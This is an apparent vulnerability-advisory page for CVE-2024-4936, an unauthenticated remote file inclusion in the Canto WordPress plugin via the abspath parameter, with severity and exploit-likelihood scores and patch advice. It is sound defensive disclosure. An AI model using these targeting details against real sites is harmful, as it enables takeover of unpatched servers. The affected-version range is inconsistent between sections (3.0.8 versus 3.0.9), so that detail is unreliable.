Cyber Resilience

CVE-2024-4936

Critical

Published: 14 June 2024

Published
14 June 2024
Modified
08 April 2026
KEV Added
Patch
CVSS Score v3.1 9.8 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS Score 0.1171 93.8th percentile
Risk Priority 27 60% EPSS · 20% KEV · 20% CVSS

Summary

CVE-2024-4936 is a critical-severity PHP Remote File Inclusion (CWE-98) vulnerability in Canto Canto. Its CVSS base score is 9.8 (Critical).

Operationally, ranked in the top 6.2% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.

Deeper analysis

The Canto plugin for WordPress is vulnerable to remote file inclusion in all versions through 3.0.8. The flaw exists in the abspath parameter handling within includes/lib/sizes.php and permits an unauthenticated attacker to supply a remote URL that the server will include and execute when the PHP allow_url_include directive is enabled on the target host. The issue carries a CVSS 3.1 score of 9.8.

An unauthenticated network attacker can exploit the vulnerability by sending a crafted request that references a remote file under their control. Successful exploitation results in arbitrary code execution on the web server with the privileges of the web-server process, giving the attacker full control over the affected WordPress site and any data it processes.

Public references from Wordfence and the WordPress plugin Trac indicate that the issue was addressed in a subsequent plugin release; administrators are advised to update to the newest version of the Canto plugin and to ensure allow_url_include remains disabled unless explicitly required.

The EPSS score for this CVE rose from a low baseline to a recorded peak of 0.1598, indicating that exploitation interest increased after public disclosure.

EU & UK References

Vulnerability details

The Canto plugin for WordPress is vulnerable to Remote File Inclusion in all versions up to, and including, 3.0.8 via the abspath parameter. This makes it possible for unauthenticated attackers to include remote files on the server, resulting in code…

more

execution. This required allow_url_include to be enabled on the target site in order to exploit.

CWE(s)

Related Threats

No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.

Affected Assets

canto
canto
≤ 3.0.9

Mitigating Controls

No mitigating controls mapped yet. The per-CVE control annotator has not reached this CVE.

References